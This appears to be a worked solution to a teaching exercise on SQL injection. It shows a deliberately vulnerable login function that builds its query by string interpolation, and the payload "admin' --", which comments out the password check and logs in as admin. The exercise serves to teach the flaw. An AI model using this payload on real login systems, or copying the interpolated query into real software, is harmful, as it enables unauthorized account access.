Exercise 2: A Real Login-Bypass SQL Injection — Possible Solution ==================================================================== THE NAIVE LOGIN FUNCTION ------------------------------ def login_naive(conn, name, password): sql = ( f"SELECT id, name FROM users " f"WHERE name = '{name}' AND password = '{password}'" ) return conn.execute(sql).fetchall() # a real users table: # (1, 'admin', 'correct-horse-battery-staple') VERIFIED, REAL RESULT ------------------------------ login_naive(conn, 'admin', 'correct-horse-battery-staple') -> [(1, 'admin')] # correct credentials, as expected login_naive(conn, 'admin', 'wrong') -> [] # wrong password, correctly rejected bypass_name = "admin' --" login_naive(conn, bypass_name, 'anything-at-all') -> [(1, 'admin')] # logged in with NO real password known THE REAL, EXECUTED SQL ------------------------------ SELECT id, name FROM users WHERE name = 'admin' --' AND password = 'anything-at-all' SQL's own "--" starts a comment that runs to the end of the line, so everything from "--' AND password = ..." onward is discarded by the database entirely. The real query that actually executes is just "WHERE name = 'admin'" - the entire password check is gone, not merely bypassed with a lucky guess. WHY THIS WORKS AS AN ANSWER ------------------------------ It follows the chapter's own exact naive-interpolation shape, extended to a second column, and constructs a real payload that doesn't guess or brute-force the password at all - it removes the password check from the query outright by commenting it out, which is the genuine, documented mechanism behind real login-bypass SQL injection attacks, not an invented shortcut specific to this exercise.